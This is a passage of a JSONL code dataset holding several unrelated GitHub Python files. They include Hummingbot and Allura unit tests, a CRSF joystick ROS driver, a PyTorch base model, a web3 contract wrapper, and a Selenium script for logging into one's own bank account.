\"limit\",\n order_type=(\n in_flight_order.trade_type.name.lower()\n + (\"_po\" if in_flight_order.order_type == OrderType.LIMIT_MAKER else \"\")\n ),\n price=in_flight_order.price,\n size=in_flight_order.amount,\n filled_size=Decimal(\"0\"),\n direction=in_flight_order.trade_type.name.lower(),\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n status_update = self.order_updates_logger.event_log[0]\n\n self.assertEqual(self.trading_pair, status_update.trading_pair)\n self.assertEqual(self.initial_timestamp + 1, status_update.update_timestamp)\n self.assertEqual(OrderState.OPEN, status_update.new_state)\n self.assertEqual(in_flight_order.client_order_id, status_update.client_order_id)\n self.assertEqual(target_order_hash, status_update.exchange_order_id)\n\n @patch(\n \"hummingbot.connector.gateway.clob_spot.data_sources.injective.injective_api_data_source\"\n \".InjectiveAPIDataSource._update_account_address_and_create_order_hash_manager\",\n new_callable=AsyncMock,\n )\n def test_parses_transaction_event_for_order_creation_failure(self, _: AsyncMock):\n creation_transaction_hash = \"0x7cb1eafc389349f86da901cdcbfd9119435a2ea84d61c17b6ded778b6fd2f81d\" # noqa: mock\n target_order_hash = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_transaction_hash=creation_transaction_hash,\n exchange_order_id=target_order_hash,\n )\n self.tracker.start_tracking_order(order=in_flight_order)\n self.injective_async_client_mock.configure_order_status_update_response(\n timestamp=self.initial_timestamp,\n order=in_flight_order,\n creation_transaction_hash=creation_transaction_hash,\n is_failed=True,\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n status_update = self.order_updates_logger.event_log[1]\n\n self.assertEqual(self.trading_pair, status_update.trading_pair)\n self.assertEqual(self.initial_timestamp, status_update.update_timestamp)\n self.assertEqual(OrderState.FAILED, status_update.new_state)\n self.assertEqual(in_flight_order.client_order_id, status_update.client_order_id)\n self.assertEqual(0, len(self.trade_updates_logger.event_log))\n\n def test_parses_transaction_event_for_order_cancelation(self):\n cancelation_transaction_hash = \"0x7cb1eafc389349f86da901cdcbfd9119435a2ea84d61c17b6ded778b6fd2f81d\" # noqa: mock\n target_order_hash = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_transaction_hash=\"someHash\",\n exchange_order_id=target_order_hash,\n )\n in_flight_order.order_fills[\"someHash\"] = None # to prevent order creation transaction request\n self.tracker.start_tracking_order(order=in_flight_order)\n in_flight_order.cancel_tx_hash = cancelation_transaction_hash\n self.injective_async_client_mock.configure_cancelation_transaction_stream_event(\n timestamp=self.initial_timestamp + 1,\n transaction_hash=cancelation_transaction_hash,\n order_hash=target_order_hash,\n )\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp + 1,\n order_hash=target_order_hash,\n state=\"canceled\",\n execution_type=\"limit\",\n order_type=in_flight_order.trade_type.name.lower(),\n price=in_flight_order.price,\n size=in_flight_order.amount,\n filled_size=Decimal(\"0\"),\n direction=in_flight_order.trade_type.name.lower(),\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n status_update = self.order_updates_logger.event_log[1]\n\n self.assertEqual(self.trading_pair, status_update.trading_pair)\n self.assertEqual(self.initial_timestamp + 1, status_update.update_timestamp)\n self.assertEqual(OrderState.CANCELED, status_update.new_state)\n self.assertEqual(in_flight_order.client_order_id, status_update.client_order_id)\n self.assertEqual(target_order_hash, status_update.exchange_order_id)\n","repo_name":"hummingbot/hummingbot","sub_path":"test/hummingbot/connector/gateway/clob_spot/data_sources/injective/test_injective_api_data_source.py","file_name":"test_injective_api_data_source.py","file_ext":"py","file_size_in_byte":41966,"program_lang":"python","lang":"en","doc_type":"code","stars":6520,"dataset":"github-code","pt":"34"} +{"seq_id":"37636183406","text":"import pandas as pd\nimport numpy as np\n\nData = pd.read_csv('Day4.txt', sep=',')\ndf = pd.DataFrame()\n\ndf['Pair1 start'] = Data.Pair1.str.split('-').str[0]\ndf['Pair1 end'] = Data.Pair1.str.split('-').str[1]\ndf['Pair2 start'] = Data.Pair2.str.split('-').str[0]\ndf['Pair2 end'] = Data.Pair2.str.split('-').str[1]\ndf = df.to_numpy(dtype=int)\n\ncount = np.zeros(len(df))\nfor n in range(0, len(df), 1):\n if df[n, 1] < df[n, 2]:\n count[n] = 1\n elif df[n, 3] < df[n, 0]:\n count[n] = 1\n\nprint(len(df)-np.sum(count))\n","repo_name":"supergermy/adventofcode_2022","sub_path":"SW/Day4/Day4.py","file_name":"Day4.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42921565468","text":"import numpy as np \nimport pandas as pd \nimport pprint as pp\n\ndef install_to_numeric(nparray):\n new_data = []\n for ele in nparray:\n value = \"\".join(ele[0][:-1].split(','))\n if value != None:\n new_data.append(int(value))\n else:\n new_data.append(np.nan)\n # return pd.DataFrame(nparray)\n return np.asarray(new_data)\n","repo_name":"Bojackxiang/advertisementReco","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16171694329","text":"import os\nfrom os.path import join\nimport imageio\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport time\n\n# -----------------------------------------------------------------------------\n\nclass BaseModel(nn.Module):\n\n def __init__(self, **kwargs):\n super(BaseModel, self).__init__()\n\n # ---- modules ----\n # by default, use \"model\" as the field name. you could of course customize.\n self.module_names = ['model']\n self.model = None # should be an instance of nn.Module\n\n def initialize(self, init_method='kaiming', model_path=None, verbose=False):\n \"\"\"initialize parameters by certain distribution\n Args:\n init_method: allowed: 'normal', 'xavier', 'kaiming', 'orthogonal', 'nothing'\n model_path: path to pretrained model\n verbose: if print out info\n \"\"\"\n from modules.module_utils import init_weights\n for name in self.module_names:\n init_weights(getattr(self, name), init_type=init_method, verbose=verbose)\n\n if model_path is not None and isinstance(model_path, str):\n self.load_special(model_path, verbose=verbose)\n\n def load_special(self, model_path, verbose=False):\n \"\"\"load model from pretrained model of not exactly this class\n i.e. you would need to copy some pretrained weights to this class\n - you may also decide specific method given your setting, e.g. self.architecture\n - always called if model_path is string\n \"\"\"\n\n pass\n\n def load(self, model_path, verbose=False):\n \"\"\"load model from pretrained model of exactly this class (often called manually)\n \"\"\"\n if verbose: print( \"initializing from pretrained model...\" )\n tic = time.time()\n\n try:\n state_dicts = torch.load(model_path)\n self.load_state_dict(state_dicts['model'], strict=False)\n if verbose: print( \"initialized model from pretrained %s (%.1f sec)\" % ( model_path, time.time()-tic ) )\n\n except:\n from modules.module_utils import copy_weights\n if model_path not in ['', None]:\n copy_weights(src_path=model_path, dst_net=self,\n keywords=None,\n name_maps=[\n lambda dst: dst,\n # lambda dst: 'sparse_point_net.' + dst.replace('densify_net.', '')\n ], verbose=True)\n if verbose: print( \"(SPECIAL) initialized model from pretrained %s (%.1f sec)\" % ( model_path, time.time()-tic ) )\n\n def save(self, model_dir, iter_num):\n raise NotImplementedError\n\n def parms(self):\n parms_list = []\n for name in self.module_names:\n parms_list += list(getattr(self, name).parameters())\n return parms_list\n\n def optimizable_parms(self):\n \"\"\" parameters to be optimized. Default: all parameters\n This function can be override by child-classes\n \"\"\"\n return self.parms()\n\n def named_parms(self):\n parms_dict = {}\n for name in self.module_names:\n parms_dict[name] = dict(getattr(self, name).named_parameters())\n return parms_dict\n\n def print(self, verbose=2):\n from utils.debug import print_network\n for name in self.module_names:\n print_network(getattr(self, name), verbose=verbose)\n\n def print_setting(self):\n # print out information as in **kwargs\n pass\n\n def forward(self, x):\n raise NotImplementedError(f\"forward function not yet specified\")\n","repo_name":"TimoBolkart/TEMPEH","sub_path":"models/model_aligner/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"34"} +{"seq_id":"70235034337","text":"import os\nimport json\n\nfrom web3 import Web3, HTTPProvider\nfrom web3.contract import ConciseContract\nfrom hexbytes.main import HexBytes\n\nclass SmartCheck():\n def __init__(self, contractList, network, tx_hash):\n compiled_sol = os.path.join('./build', contractList['SmartCheck'][2:].replace('.sol', '.json'))\n with open(compiled_sol, 'r') as f:\n contract_interface = json.load(f)\n\n # web3.py instance\n w3 = Web3(Web3.HTTPProvider(network))\n\n # Get tx receipt to get contract address\n tx_Hash = HexBytes(tx_hash)\n tx_receipt = w3.eth.getTransactionReceipt(tx_Hash)\n contract_address = tx_receipt['contractAddress']\n\n # Contract instance in concise mode\n abi = contract_interface['abi']\n contract_instance = w3.eth.contract(address=contract_address, abi=abi, ContractFactoryClass=ConciseContract)\n\n self.w3 = w3\n self.contract_instance = contract_instance\n\n def _createStudent(self, studId, age, fName, lName):\n self.contract_instance.createStudent(studId, age, fName, lName, transact={'from': self.w3.eth.accounts[0]})\n\n def _getParticularStudent(self, studId):\n _fName, _lName, _age, _attendanceValue = self.contract_instance.getParticularStudent(studId)\n return {\n \"fName\": _fName.decode('utf-8'),\n \"lName\": _lName.decode('utf-8'),\n \"age\": _age,\n \"attendanceValue\": _attendanceValue,\n }\n\n def _getStudents(self):\n return { \"studIdList\": self.contract_instance.getStudents() }","repo_name":"yunsu246/smart-check","sub_path":"backend/app/api/SmartCheck.py","file_name":"SmartCheck.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9849419612","text":"import csv\nimport json\nimport os,sys\n\ndef makejson(csvfilepath):\n\tdata={}\n\t\n\n\twith open(csvfilepath,encoding='utf-8') as csvf:\n\t\t\n\t\tcsvreader=csv.DictReader(csvf)\n\t\tfor index,row in enumerate(csvreader):\n\t\t\tcondition=row[\"condition\"]\n\t\t\tcondition_cui=row[\"condition_cui\"]\n\t\t\tif(index==0):\n\t\t\t\tdata[condition]={}\n\t\t\t\tdata[condition][\"cui\"]=condition_cui\n\t\t\t\tdata[condition][\"have_had\"]={}\n\t\t\t\tdata[condition][\"looking_for\"]={}\n\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]]={}\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"cui\"]=row[\"label_cui\"]\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"score\"]=row[\"label_score\"]\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"label_semantic_types\"]=row[\"label_semantic_types\"]\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"label_ncts_counts\"]=row[\"label_ncts_count\"]\n\t\t\tdata[condition][row[\"label_bucket\"]][row[\"label\"]][\"ncts\"]=row[\"label_ncts\"]\n\twith open(\"combined.json\",'w') as js:\n\t\tjs.write(json.dumps(data,sort_keys=True,indent=4))\n\t\n\treturn \n\n\ndef makecsv(jfilepath):\n\tjsonfile=open(jfilepath,'r')\n\tjsondata = json.load(jsonfile)\n\tedata = open('1.csv', 'w')\n\tcsvwriter = csv.writer(edata)\n\tdata=[]\n\tcsvwriter.writerow([\"condition\",\"condition_cui\",\"label\",\n\t\t\t\"label_cui\",\"label_score\",\"label_semantic_types\",\n\t\t\t\"label_ncts\",\"label_bucket\",\"label_ncts_count\"])\n\tfor k,v in jsondata.items():\n\t\tfor y,x in jsondata[k][\"have_had\"].items():\n\t\t\tdata.append([k,v[\"cui\"],y,jsondata[k][\"have_had\"][y][\"cui\"],\n\t\t\t\tjsondata[k][\"have_had\"][y][\"score\"],\n\t\t\t\tjsondata[k][\"have_had\"][y][\"label_semantic_types\"],\n\t\t\t\tjsondata[k][\"have_had\"][y][\"label_ncts_counts\"],\n\t\t\t\t\"have_had\",\n\t\t\t\tjsondata[k][\"have_had\"][y][\"ncts\"]])\n\n\t\tfor y,x in jsondata[k][\"looking_for\"].items():\n\t\t\tdata.append([k,v[\"cui\"],y,jsondata[k][\"looking_for\"][y][\"cui\"],\n\t\t\t\tjsondata[k][\"looking_for\"][y][\"score\"],\n\t\t\t\tjsondata[k][\"looking_for\"][y][\"label_semantic_types\"],\n\t\t\t\tjsondata[k][\"looking_for\"][y][\"label_ncts_counts\"],\n\t\t\t\t\"looking_for\",\n\t\t\t\tjsondata[k][\"looking_for\"][y][\"ncts\"]])\n\tfor x in data:\n\t\tcsvwriter.writerow(x)\n\tedata.close()\n\n\treturn \n\n\nfile_namescsv=sys.argv[1]\nfile_namesjson=sys.argv[2]\n\nmakejson(file_namescsv)\n\nmakecsv(file_namesjson)\n\n","repo_name":"ayazwani/fileconversions-data-","sub_path":"cmd2.py","file_name":"cmd2.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72659824099","text":"import mock\nimport tg\nfrom nose.tools import assert_equal, assert_in, assert_not_in\n\nfrom alluratest.controller import TestRestApiBase\nfrom allura.model import Project, User\nfrom allura.tests import decorators as td\nfrom allura.tests import TestController\n\n\nclass TestUserProfile(TestController):\n\n @td.with_user_project('test-admin')\n def test_profile(self):\n r = self.app.get('/u/test-admin/profile/')\n assert_equal('Test Admin',\n r.html.find('h1', 'project_title').find('a').text)\n sections = set([c for s in r.html.findAll(None, 'profile-section') for c in s['class'].split()])\n assert_in('personal-data', sections)\n assert_in('Username:test-admin', r.html.find(None, 'personal-data').getText())\n assert_in('projects', sections)\n assert_in('Test Project', r.html.find(None, 'projects').getText())\n assert_in('Last Updated:less than 1 minute ago', r.html.find(None, 'projects').getText())\n assert_in('tools', sections)\n assert_in('Admin', r.html.find(None, 'tools').getText())\n assert_in('skills', sections)\n assert_in('No skills entered', r.html.find(None, 'skills').getText())\n\n def test_wrong_profile(self):\n self.app.get('/u/no-such-user/profile/', status=404)\n\n @td.with_user_project('test-user')\n def test_missing_user(self):\n User.query.remove(dict(username='test-user'))\n p = Project.query.get(shortname='u/test-user')\n assert p is not None and p.is_user_project\n response = self.app.get('/u/test-user/profile/', status=404)\n\n def test_differing_profile_proj_shortname(self):\n User.upsert('foo_bar')\n\n # default auth provider's user_project_shortname() converts _ to - for the project name\n response = self.app.get('/u/foo_bar/profile/', status=302)\n assert_equal(response.location, 'http://localhost/u/foo-bar/')\n\n # unfortunately this doesn't work because the default auth provider's user_by_project_shortname()\n # doesn't try converting back (and it probably shouldn't since you could get multiple users with conflicting proj names)\n # at least this works with other auth providers that have a more complete implementation of both\n # user_project_shortname() and user_by_project_shortname()\n #self.app.get('/u/foo-bar/profile/')\n\n @td.with_user_project('test-admin')\n @td.with_wiki\n def test_feed(self):\n for ext in ['', '.rss', '.atom']:\n r = self.app.get('/u/test-admin/profile/feed%s' % ext, status=200)\n assert 'Recent posts by Test Admin' in r\n assert 'Home modified by Test Admin' in r\n\n @td.with_user_project('test-admin')\n @td.with_user_project('test-user')\n @mock.patch('allura.tasks.mail_tasks.sendsimplemail')\n @mock.patch('allura.lib.helpers.gen_message_id')\n @mock.patch('allura.model.User.can_send_user_message')\n def test_send_message(self, check, gen_message_id, sendsimplemail):\n check.return_value = True\n gen_message_id.return_value = 'id'\n test_user = User.by_username('test-user')\n test_user.set_pref('email_address', 'test-user@example.com')\n response = self.app.get(\n '/u/test-user/profile/send_message', status=200)\n assert 'From: "Test Admin" <test-admin@users.localhost>' in response\n self.app.post('/u/test-user/profile/send_user_message',\n params={'subject': 'test subject',\n 'message': 'test message',\n 'cc': 'on'})\n\n sendsimplemail.post.assert_called_once_with(\n cc=User.by_username('test-admin').get_pref('email_address'),\n text=u'test message\\n\\n---\\n\\nThis message was sent to you via the Allura web mail form. You may reply to this message directly, or send a message to Test Admin at http://localhost:8080/u/test-admin/profile/send_message\\n',\n toaddr=User.by_username('test-user').get_pref('email_address'),\n fromaddr=User.by_username('test-admin').get_pref('email_address'),\n reply_to=User.by_username('test-admin').get_pref('email_address'),\n message_id=u'id',\n subject=u'test subject')\n sendsimplemail.reset_mock()\n self.app.post('/u/test-user/profile/send_user_message',\n params={'subject': 'test subject',\n 'message': 'test message'})\n\n sendsimplemail.post.assert_called_once_with(\n cc=None,\n text=u'test message\\n\\n---\\n\\nThis message was sent to you via the Allura web mail form. You may reply to this message directly, or send a message to Test Admin at http://localhost:8080/u/test-admin/profile/send_message\\n',\n toaddr=User.by_username('test-user').get_pref('email_address'),\n fromaddr=User.by_username('test-admin').get_pref('email_address'),\n reply_to=User.by_username('test-admin').get_pref('email_address'),\n message_id=u'id',\n subject=u'test subject')\n\n check.return_value = False\n response = self.app.get(\n '/u/test-user/profile/send_message', status=200)\n assert 'Sorry, messaging is rate-limited' in response\n\n @td.with_user_project('test-user')\n def test_send_message_for_anonymous(self):\n r = self.app.get('/u/test-user/profile/send_message',\n extra_environ={'username': '*anonymous'},\n status=302)\n assert 'You must be logged in to send user messages.' in self.webflash(\n r)\n\n r = self.app.post('/u/test-user/profile/send_user_message',\n params={'subject': 'test subject',\n 'message': 'test message',\n 'cc': 'on'},\n extra_environ={'username': '*anonymous'},\n status=302)\n assert 'You must be logged in to send user messages.' in self.webflash(\n r)\n\n @td.with_user_project('test-user')\n def test_link_to_send_message_form(self):\n User.by_username('test-admin').set_pref('email_address',\n 'admin@example.com')\n User.by_username('test-user').set_pref('email_address',\n 'user@example.com')\n r = self.app.get('/u/test-user/profile',\n status=200)\n assert r.html.find('a', dict(href='send_message'))\n\n @td.with_user_project('test-user')\n def test_disable_user_messages(self):\n User.by_username('test-admin').set_pref('email_address',\n 'admin@example.com')\n test_user = User.by_username('test-user')\n test_user.set_pref('email_address', 'user@example.com')\n test_user.set_pref('disable_user_messages', True)\n r = self.app.get('/u/test-user/profile')\n assert 'Send me a message' not in r\n r = self.app.get('/u/test-user/profile/send_message', status=302)\n assert 'This user has disabled direct email messages' in self.webflash(\n r)\n\n @td.with_user_project('test-user')\n def test_profile_sections(self):\n project = Project.query.get(shortname='u/test-user')\n app = project.app_instance('profile')\n\n def ep(n):\n m = mock.Mock()\n m.name = n\n m.load()().display.return_value = 'Section %s' % n\n return m\n eps = map(ep, ['a', 'b', 'c', 'd'])\n order = {'user_profile_sections.order': 'b, d,c , f '}\n if hasattr(type(app), '_sections'):\n delattr(type(app), '_sections')\n with mock.patch('allura.lib.helpers.iter_entry_points') as iep:\n with mock.patch.dict(tg.config, order):\n iep.return_value = eps\n sections = app.profile_sections\n assert_equal(sections, [\n eps[1].load(),\n eps[3].load(),\n eps[2].load(),\n eps[0].load()])\n r = self.app.get('/u/test-user/profile')\n assert_in('Section a', r.body)\n assert_in('Section b', r.body)\n assert_in('Section c', r.body)\n assert_in('Section d', r.body)\n assert_not_in('Section f', r.body)\n\n\nclass TestUserProfileHasAccessAPI(TestRestApiBase):\n\n @td.with_user_project('test-admin')\n def test_has_access_no_params(self):\n self.api_get('/rest/u/test-admin/profile/has_access', status=404)\n self.api_get('/rest/u/test-admin/profile/has_access?user=root', status=404)\n self.api_get('/rest/u/test-admin/profile/has_access?perm=read', status=404)\n\n @td.with_user_project('test-admin')\n def test_has_access_unknown_params(self):\n \"\"\"Unknown user and/or permission always False for has_access API\"\"\"\n r = self.api_get(\n '/rest/u/test-admin/profile/has_access?user=babadook&perm=read',\n user='root')\n assert_equal(r.status_int, 200)\n assert_equal(r.json['result'], False)\n r = self.api_get(\n '/rest/u/test-admin/profile/has_access?user=test-user&perm=jump',\n user='root')\n assert_equal(r.status_int, 200)\n assert_equal(r.json['result'], False)\n\n @td.with_user_project('test-admin')\n def test_has_access_not_admin(self):\n \"\"\"\n User which has no 'admin' permission on neighborhood can't use\n has_access API\n \"\"\"\n self.api_get(\n '/rest/u/test-admin/profile/has_access?user=test-admin&perm=admin',\n user='test-user',\n status=403)\n\n @td.with_user_project('test-admin')\n def test_has_access(self):\n r = self.api_get(\n '/rest/u/test-admin/profile/has_access?user=test-admin&perm=admin',\n user='root')\n assert_equal(r.status_int, 200)\n assert_equal(r.json['result'], True)\n r = self.api_get(\n '/rest/u/test-admin/profile/has_access?user=test-user&perm=admin',\n user='root')\n assert_equal(r.status_int, 200)\n assert_equal(r.json['result'], False)\n","repo_name":"lym/allura-git","sub_path":"Allura/allura/tests/functional/test_user_profile.py","file_name":"test_user_profile.py","file_ext":"py","file_size_in_byte":10257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"32342804183","text":"from dataclasses import dataclass\nfrom threading import Lock, Thread\nfrom typing import List\nfrom construct import Container\nfrom time import sleep, time\nfrom sensor_msgs.msg import Joy\nfrom .joy_publisher import JoyPublisher\nfrom serial import Serial\nfrom crsf_parser import CRSFParser, PacketsTypes, PacketValidationStatus\nimport rospy\n\n\n@dataclass\nclass CRSFConfiguration:\n \"\"\"\n CRSF driver configuration\n \"\"\"\n\n axis_map: List[int]\n buttons_map: List[int]\n serial_port: str\n serial_baudrate: int\n joy_message_rate: float\n failsafe_timeout: float\n failsafe_axis: List[float]\n failsafe_buttons: List[float]\n deadband: float\n\n def __repr__(self) -> str:\n ret = f\"\"\"configuration:\n axis_map:{self.axis_map}\n buttons_map:{self.buttons_map}\n serial: {self.serial_port} @ {self.serial_baudrate}\n joy message rate: {self.joy_message_rate}\n failsafe: timeout {self.failsafe_timeout}, axis[{self.failsafe_axis}] , buttons [{self.failsafe_buttons}]\n deadband: {self.deadband}\n \"\"\"\n return ret\n\n\nclass CRSFDrv:\n \"\"\"\n CRSF Joy Driver implementaton\n \"\"\"\n\n def __init__(self, config: CRSFConfiguration, publisher: rospy.Publisher) -> None:\n\n self._config = config\n self._message_pub = publisher\n self._joy_publisher = JoyPublisher(\n self._config.axis_map, self._config.buttons_map, self._message_pub\n )\n\n self._values_lock = Lock()\n self._last_values = None\n self._last_update_time: float = 0\n self._is_running = True\n\n self._crsf_parser = CRSFParser(self.publish)\n\n self._publishing_thread = Thread(target=self._publishing_worker)\n\n def _set_failsafe(self) -> None:\n self._joy_publisher.publish(\n self._config.failsafe_axis, self._config.failsafe_buttons\n )\n\n def _publishing_worker(self) -> None:\n try:\n previous_update = 0\n while self._is_running:\n with self._values_lock:\n time_since_last_update = time() - self._last_update_time\n if time_since_last_update > self._config.failsafe_timeout:\n self._set_failsafe()\n else:\n if previous_update != self._last_update_time:\n previous_update = self._last_update_time\n self._joy_publisher.remap_and_publish(self._last_values)\n sleep(1.0 / self._config.joy_message_rate)\n finally:\n self._set_failsafe()\n self._is_running = False\n\n def adjust_channel(self, value: float) -> float:\n value = value if abs(value) > self._config.deadband else 0\n value = max(-1.0, min(1.0, value))\n return value\n\n def publish(self, packet: Container, status: PacketValidationStatus) -> None:\n if status == PacketValidationStatus.VALID:\n if packet.header.type == PacketsTypes.RC_CHANNELS_PACKED:\n with self._values_lock:\n # derived from CRSF spec Rev7, TICKS_TO_US(x) = ((x - 992) * 5 / 8 + 1500)\n channels = [\n ((x - 992) * 10 / 8000) for x in packet.payload.channels\n ]\n channels = [self.adjust_channel(x) for x in channels]\n # Inversion is a temporary workaround as the parser return them reversed\n self._last_values = channels[::-1]\n self._last_update_time = time()\n else:\n rospy.logwarn_throttle(\n 5, f\"received invalid data with status {status}, {packet}\"\n )\n\n def run(self) -> None:\n with Serial(\n self._config.serial_port, self._config.serial_baudrate, timeout=2\n ) as ser:\n input_data = bytearray()\n self._is_running = True\n self._publishing_thread.start()\n while not rospy.is_shutdown():\n values = ser.read(100)\n input_data.extend(values)\n self._crsf_parser.parse_stream(input_data)\n\n self._is_running = False\n self._publishing_thread.join()\n","repo_name":"AlessioMorale/ros_crsf_driver","sub_path":"crsf_drv/crsf_drv.py","file_name":"crsf_drv.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"37293302640","text":"#coding=utf-8\n\nfrom builtins import str\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nfrom basie.procedures import Procedure, PROC_PREFIX\n\nclass TestProcedures(unittest.TestCase):\n def setUp(self):\n self.simple_procedure = Procedure(\"SIMPLE\", 0, \"\\tnop\\n\")\n self.simple_procedure_two = Procedure(\"SIMPLE_TWO\", 0, \"\\tnop_two\\n\")\n self.one_param_procedure = Procedure(\"ONE_PARAM\", 1, \"\\tparam=$1\\n\",\n True)\n\n def test_simple_procedure_definition(self):\n self.assertEqual(str(self.simple_procedure),\n \"%sSIMPLE{\\n\\tnop\\n}\\n\" % (PROC_PREFIX,))\n self.assertEqual(self.simple_procedure.execute(),\n \"%sSIMPLE\" % (PROC_PREFIX,))\n\n def test_simple_procedure_sum(self):\n sum_procedure = self.simple_procedure + self.simple_procedure_two\n self.assertEqual(str(sum_procedure),\n \"%sSIMPLE_SIMPLE_TWO{\\n\\tnop\\n\\tnop_two\\n}\\n\" %\n (PROC_PREFIX,))\n self.assertEqual(sum_procedure.execute(),\n \"%sSIMPLE_SIMPLE_TWO\" % (PROC_PREFIX,))\n\n def test_one_param_procedure_definition(self):\n self.assertEqual(str(self.one_param_procedure),\n \"%sONE_PARAM(1){\\n\\tparam=$1\\n}\\n\" % (PROC_PREFIX,))\n\n def test_one_param_procedure_execution(self):\n one_param = self.one_param_procedure(\"test\")\n self.assertEqual(str(one_param),\n \"%sONE_PARAM(1){\\n\\tparam=$1\\n}\\n\" % (PROC_PREFIX,))\n self.assertEqual(one_param.execute(),\n \"%sONE_PARAM=test\" % (PROC_PREFIX,))\n\n def test_sum_simple_one_param_definition(self):\n sum_procedure = self.simple_procedure + self.one_param_procedure\n self.assertEqual(str(sum_procedure),\n \"%sSIMPLE_ONE_PARAM(1){\\n\\tnop\\n\\tparam=$1\\n}\\n\" %\n (PROC_PREFIX,))\n\n def test_sum_simple_one_param_execution(self):\n # i want this to work eventually\n #sum_procedure = self.simple_procedure + \\\n # self.one_param_procedure(\"test\")\n sum_procedure = (self.simple_procedure + \\\n self.one_param_procedure)(\"test\")\n self.assertEqual(str(sum_procedure),\n \"%sSIMPLE_ONE_PARAM(1){\\n\\tnop\\n\\tparam=$1\\n}\\n\" %\n (PROC_PREFIX,))\n self.assertEqual(sum_procedure.execute(),\n \"%sSIMPLE_ONE_PARAM=test\" % (PROC_PREFIX,))\n\n\n","repo_name":"discos/basie","sub_path":"test/test_procedures.py","file_name":"test_procedures.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34071478918","text":"\"\"\"Login na página do Banco do Brasil.\"\"\"\n\nimport time\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\ndef login_banco(driver, agencia=None, conta=None, senha=None):\n \"\"\"Login na página do Banco do Brasil.\n\n A página já deve estar na página de acesso à conta.\n @param driver: driver da página Selenium\n @param agencia: número da agencia (com DV, sem traço)\n @param conta: número da conta (com DV, sem traço)\n @param senha: senha da conta. Caso vazia, a senha será inserida manualmente\n \"\"\"\n wdw = WebDriverWait(driver, 20)\n\n # agencia e conta\n if agencia is None or conta is None:\n print('Insira a agência e conta.')\n locator = (By.ID, 'senhaConta')\n WebDriverWait(driver, 120).until(\n ec.presence_of_element_located(locator),\n message='Encerrado: ag/conta não add.')\n\n else:\n\n # Navega para a página de login\n locator = (By.XPATH, '//*[@id=\"header\"]/header/bb-navbar-header/nav/div[2]/div[2]/bb-navbar-dropdown')\n tag = wdw.until(ec.presence_of_element_located(locator))\n driver.execute_script('arguments[0].click();', tag)\n\n locator = (By.XPATH, '//*[@id=\"cdk-overlay-0\"]/bb-dropdown-menu/bb-menu/ul/li[1]/a')\n tag = wdw.until(ec.presence_of_element_located(locator))\n driver.execute_script('arguments[0].click();', tag)\n \n # insere agencia e conta\n locator = (By.ID, 'dependenciaOrigem')\n dob = wdw.until(ec.presence_of_element_located(locator))\n for _ in range(0, 10):\n dob.send_keys(Keys.BACKSPACE)\n dob.send_keys(f'{agencia}')\n\n locator = (By.ID, 'numeroContratoOrigem')\n dob = driver.find_element(*locator)\n for _ in range(0, 10):\n dob.send_keys(Keys.BACKSPACE)\n dob.send_keys(f'{conta}')\n\n # envia os dados e vai para pagina de senha\n locator = (By.ID, 'botaoEnviar')\n driver.find_element(*locator).click()\n\n time.sleep(2) # troca de tela\n\n # senha\n if senha is None:\n print('Insira a senha da conta.')\n\n else:\n locator = (By.ID, 'senhaConta')\n dob = wdw.until(ec.presence_of_element_located(locator))\n for _ in range(0, 10):\n dob.send_keys(Keys.BACKSPACE)\n dob.send_keys(f'{senha}')\n\n locator = (By.ID, 'botaoEnviar')\n driver.find_element(*locator).click()\n\n # Tenta encontrar os titulares\n try:\n locator = (By.ID, 'dialogContent_0')\n wdw.until(\n ec.presence_of_element_located(locator))\n\n box = driver.find_element(*locator)\n box_tags = box.find_elements(By.TAG_NAME, 'a')\n box_tags[0].click()\n\n except:\n pass\n\n # espera a página carregar\n locator = (By.XPATH, '//a[@title=\"Minha página\"]')\n wdw.until(\n 